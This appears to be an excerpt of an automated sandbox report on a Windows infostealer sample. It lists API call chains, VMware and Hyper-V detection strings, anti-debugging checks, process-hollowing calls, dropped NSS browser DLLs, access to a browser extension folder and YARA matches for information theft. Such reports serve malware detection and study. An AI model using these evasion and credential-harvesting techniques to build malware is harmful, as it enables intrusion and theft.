Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API coverage: 4.3 %
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF546A FindFirstFileExW, 0_2_00EF546A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF5854 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00EF5854
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF546A FindFirstFileExW, 1_2_00EF546A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF5854 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00EF5854
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040E430
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004138B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040BE70
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_004016D0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040DA80
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040F6B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00414570
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00414910
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_0040ED20
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040DE10
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00413EA0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00401160 GetSystemInfo,ExitProcess, 2_2_00401160
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.8.dr Binary or memory string: VMware
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ND2WP0Fip7.exe, 00000002.00000002.2079734656.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2079734656.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ND2WP0Fip7.exe, 00000002.00000002.2079734656.0000000000D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareY
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ND2WP0Fip7.exe, 00000002.00000002.2079734656.0000000000D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF4EEB IsDebuggerPresent,OutputDebugStringW, 0_2_00EF4EEB
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 2_2_004045C0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00419860
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00E82606 mov edi, dword ptr fs:[00000030h] 0_2_00E82606
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EE6E1E mov ecx, dword ptr fs:[00000030h] 0_2_00EE6E1E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00F678BD mov edi, dword ptr fs:[00000030h] 0_2_00F678BD
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF799C mov eax, dword ptr fs:[00000030h] 0_2_00EF799C
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00E82559 mov edi, dword ptr fs:[00000030h] 0_2_00E82559
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00F33680 mov eax, dword ptr fs:[00000030h] 0_2_00F33680
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF77F3 mov eax, dword ptr fs:[00000030h] 0_2_00EF77F3
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF77B0 mov eax, dword ptr fs:[00000030h] 0_2_00EF77B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF776D mov eax, dword ptr fs:[00000030h] 0_2_00EF776D
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF784E mov eax, dword ptr fs:[00000030h] 0_2_00EF784E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF79CD mov eax, dword ptr fs:[00000030h] 0_2_00EF79CD
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF7958 mov eax, dword ptr fs:[00000030h] 0_2_00EF7958
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF7914 mov eax, dword ptr fs:[00000030h] 0_2_00EF7914
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00E82559 mov edi, dword ptr fs:[00000030h] 1_2_00E82559
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00E82606 mov edi, dword ptr fs:[00000030h] 1_2_00E82606
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EE6E1E mov ecx, dword ptr fs:[00000030h] 1_2_00EE6E1E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF77F3 mov eax, dword ptr fs:[00000030h] 1_2_00EF77F3
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF77B0 mov eax, dword ptr fs:[00000030h] 1_2_00EF77B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF776D mov eax, dword ptr fs:[00000030h] 1_2_00EF776D
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF784E mov eax, dword ptr fs:[00000030h] 1_2_00EF784E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF79CD mov eax, dword ptr fs:[00000030h] 1_2_00EF79CD
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF799C mov eax, dword ptr fs:[00000030h] 1_2_00EF799C
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF7958 mov eax, dword ptr fs:[00000030h] 1_2_00EF7958
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF7914 mov eax, dword ptr fs:[00000030h] 1_2_00EF7914
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00419750 mov eax, dword ptr fs:[00000030h] 2_2_00419750
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_00417850
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00ED75E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00ED75E0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EAF8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00EAF8E8
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EAFD68 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00EAFD68
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00ED75E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00ED75E0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EAF8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00EAF8E8
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EAFD68 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00EAFD68
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041AD48
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0041CEEA SetUnhandledExceptionFilter, 2_2_0041CEEA
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041B33A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C7CAC62
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 1860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ND2WP0Fip7.exe PID: 4296, type: MEMORYSTR
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00F678BD CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_00F678BD
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Memory written: C:\Users\user\Desktop\ND2WP0Fip7.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_00419600
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe" Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe" Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C814760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 2_2_6C814760
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 2_2_6C6F1C30
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7CAE71 cpuid 2_2_6C7CAE71
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 0_2_00EFA011
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00EFA13A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 0_2_00EFA240
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00EFA30F
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_00E8C540
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoEx, 0_2_00EAE558
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 0_2_00EEB2A2
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 0_2_00EEB433
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00EF998D
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 0_2_00EF9C98
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 0_2_00EF9C2F
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00EF9DBE
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 0_2_00EEBD5E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 0_2_00EF9D33
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 1_2_00EFA011
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00EFA13A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 1_2_00EFA240
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_00EFA30F
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoEx,FormatMessageA, 1_2_00E8C540
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoEx, 1_2_00EAE558
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 1_2_00EEB2A2
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 1_2_00EEB433
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 1_2_00EF998D
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 1_2_00EF9C98
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 1_2_00EF9C2F
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_00EF9DBE
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetLocaleInfoW, 1_2_00EEBD5E
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: EnumSystemLocalesW, 1_2_00EF9D33
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_00417B90
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EAFC3D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00EAFC3D
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 2_2_00417850
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF473C GetTimeZoneInformation, 0_2_00EF473C
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C718390 NSS_GetVersion, 2_2_6C718390
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.ND2WP0Fip7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.f1ab30.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.f1ab30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ND2WP0Fip7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.ND2WP0Fip7.exe.e80000.0.unpack, type: UNPACKEDPE
